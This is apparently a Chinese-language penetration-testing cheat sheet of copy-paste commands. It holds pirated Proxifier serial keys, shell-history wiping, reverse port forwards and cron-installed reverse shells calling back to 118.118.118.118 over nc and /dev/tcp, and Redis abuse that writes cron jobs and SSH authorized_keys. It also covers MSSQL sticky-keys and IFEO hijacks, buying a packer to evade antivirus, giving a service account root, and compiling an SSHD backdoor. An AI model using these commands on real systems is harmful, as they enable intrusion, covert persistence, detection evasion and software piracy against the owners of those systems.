渗透测试用到的东东.zip

# pentest 一顿复制粘贴，毫无技术含量 ## 工具集 ### proxifier 下载地址 http://www.proxifier.com/download/ 序列号 L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C（Portable Edition） 5EZ8G-C3WL5-B56YG-SCXM9-6QZAP（Standard Edition） P427L-9Y552-5433E-8DSR3-58Z68（MAC） ### proxychains-ng - https://github.com/rofl0r/proxychains-ng - https://github.com/sensepost/reGeorg ```shell # 用Mac的优势!!! brew install proxychains-ng ``` ## 高频命令 ```shell unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 python -c 'import pty; pty.spawn("/bin/sh")' ssh -C -f -N -g -R 3389:10.0.0.1:3389 gg@118.118.118.118 plink.exe -C -N -R 3389:127.0.0.1:3389 gg@118.118.118.118 -pw 123456 -P 443 set 0 "\n\n\n* * * * * bash -i >& /dev/tcp/118.118.118.118/53 0>&1\n\n\n" config set dir /var/spool/cron config set dbfilename root save config set dir /var/lib/redis config set dbfilename dump.rdb cat foo.txt | redis-cli -h 10.10.10.10 -x set 0 config set dir /root/.ssh config set dbfilename "authorized_keys" ``` ## 简单操作 ```sql # MSSQL 替换系统文件 declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe'; # IFEO劫持 EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE', @value_name='Debugger', @type='REG_SZ', @value='c:\windows\system32\cmd.exe' exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger' ``` ## 操作ES查询数据 查看索引 http://10.10.10.10:9200/_cat/indices 搜索数据 http://10.10.10.10:9200/hello/_search?pretty&size=50&from=50 ## 短期内持久化 ```shell (crontab -l;echo '*/60 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc -w 3 118.118.118.118 53 >/tmp/yum.log')|crontab - (crontab -l;echo '*/5 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc 118.118.118.118 53 >/tmp/yum.log')|crontab - (crontab -l;echo '*/1 * * * * exec 9<> /dev/tcp/118.118.118.118/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - ``` ## 买个最新的壳快速免杀 支持微信支付，萌萌哒 https://vmpsoft.com/purchase/buy-online/ ## 已有用户加个密码复用 ```shell # 替换用户shell usermod -s /bin/bash ntp usermod -g root ntp # 给予root权限 passwd ntp # 加个密码，改个/etc/passwd id = 0 ``` ## 编译SSHD后门 ```shell ./configure --sysconfdir=/etc/ssh --bindir=/usr/bin --sbindir=/usr/sbin --prefix=/usr --with-pam --with-tcp-wrappers --with-kerberos5 --without-zlib-version-check --without-openssl-header-check ```